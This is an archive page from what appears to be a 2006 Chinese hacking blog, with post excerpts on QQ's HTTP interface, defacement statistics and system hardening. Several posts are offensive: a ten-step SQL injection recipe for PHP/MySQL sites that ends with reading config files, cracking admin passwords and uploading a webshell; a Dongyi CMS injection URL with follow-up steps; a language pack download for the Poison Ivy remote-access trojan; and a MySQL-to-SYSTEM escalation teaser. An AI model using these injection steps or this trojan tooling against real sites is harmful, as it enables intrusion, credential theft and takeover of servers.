注册 | 登录 | 归档 | 搜索 | 标签 | 评论 | 链接 | 滚动板 | 在线工具
浏览模式: 标准 | 列表 2006年11月的文章

我不是啊

Posted by amxku on 2006-11-30, 7:32 PM

我不是啊
qqq.jpg 大小: 8.42 K 尺寸: 350 x 126 浏览: 404 次 点击打开新窗口浏览全图

Tags: 被黑站点, 迅雷

其它 | 评论: 5 | 阅读: 3414

WEB QQ 网页登陆QQ QQ的HTTP接口探究

Posted by amxku on 2006-11-30, 10:13 AM

1、研究说明

  Tencent在tqq.tencent.com的8000有一个使用HTTP的qq接口,通过这个接口,可以进行一些基本的操作,如:登陆、登出、改变登陆状态(上线、忙碌、离线、隐身)、添加删除好友、查看好友信息、发送验证信息(接受被加为好友、申请加对方为好友、拒绝被加为好友)、收发用户消息、系统信息。

  目前我研究的是1.1版本的HTTP qq协议,研究是微程在的成果上进行的,不敢说有什么超越,只不过更为详细和准确。

2、接口说明:

  接口位置:tqq.tencent.com:8000
  通信协议:HTTP
  数据传输方法:POST
  HTTP请求格式:

» 阅读全文

Tags: 技术, 学习, php, qq

技术 | 评论: 0 | 阅读: 6948

Bambalam PHP EXE Compiler/Embedder

Posted by amxku on 2006-11-26, 5:13 PM

一个小巧的命令行工具,能够把 php 脚本转换成 windows 的标准 exe 可执行文件,我们可以用他把那些 php 写的 exp 转换成 exe ,这样就不用再在 php 环境下运行 exp 了。
鬼仔's Blog那看到的

» 阅读全文

Tags: 工具, php

共享 | 评论: 4 | 阅读: 3629

中国被黑站点统计系统分析报告(Alert2006-11)

Posted by amxku on 2006-11-22, 3:17 AM

中国被黑站点统计系统分析报告(Alert2006-11)
[ zone-h.Com.Cn ] Analytical report in November 2006
http://www.zone-h.com.cn

amxku [amxku_at_msn.com]
自在轮回 [zizailunhui_at_msn.com]
wayking [wayking_at_hotmail.com]

 目录 
   00- 综述 
   01- 分析 
   02- 防护 
   03- 总结 
   04- 声明

» 阅读全文

Tags: zone-h, 原创

共享 | 评论: 1 | 阅读: 3834

总结php注入十点基本步骤

Posted by amxku on 2006-11-20, 12:53 PM

1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6.如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。
8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。
9.同理再猜解password字段,猜解成功再找后台登录。
10.登录后台,上传shell。

Tags: 脚本渗透

共享 | 评论: 0 | 阅读: 2712

Poison Ivy 2.1.1中文包

Posted by amxku on 2006-11-20, 10:51 AM

就一个外挂包,解压后把文件复制到你的Poison Ivy 2.1.1目录下
名字改为跟你Poison Ivy 2.1.1里的控制端一样的名字即可
如:你的控制端为Poison Ivy 2.1.1.exe,那中文包就改为Poison Ivy 2.1.1.chs


附件: poison ivy 2[1].1.1.zip [ 100.27 K, 下载次数:1353 ]

Tags: 工具

共享 | 评论: 3 | 阅读: 3687

将MYSQL读写权限转化为系统system权限

Posted by amxku on 2006-11-20, 9:52 AM

作者:langouster
Mysql for Win MYSQL账号有数据操作权限就有system权限

» 阅读全文

Tags: 工具, 入侵

共享 | 评论: 0 | 阅读: 3400

动易的漏洞又冒出来了

Posted by amxku on 2006-11-19, 10:41 PM

信息来源:h4x0r's blog

前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL
http://site.com/region.asp?country=tt&city=whytt&province=shi'
后面就是SQL语句啦

返回信息:
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
字符串 'shi'' 之前有未闭合的引号。
/region.asp,行 32

针对mssql的
NBSI 直接列目录 >备份> ok!

Tags: exp, 漏洞, 脚本渗透, 动易

共享 | 评论: 2 | 阅读: 2980

突然有点不习惯

Posted by amxku on 2006-11-17, 2:43 PM

突然有点不习惯灯红酒绿的生活
2006-11-15这是个不错的日子,有必要记住
人也要记住,

灯红酒绿的生活……

Tags: 生活

其它 | 评论: 5 | 阅读: 2960

加密CMD使电脑溢出也拿不到CMD权限

Posted by amxku on 2006-11-14, 7:59 PM

加密CMD使电脑溢出也拿不到CMD权限
一种防溢出的好办法哈

» 阅读全文

Tags: 系统安全

共享 | 评论: 5 | 阅读: 4477

Records:27123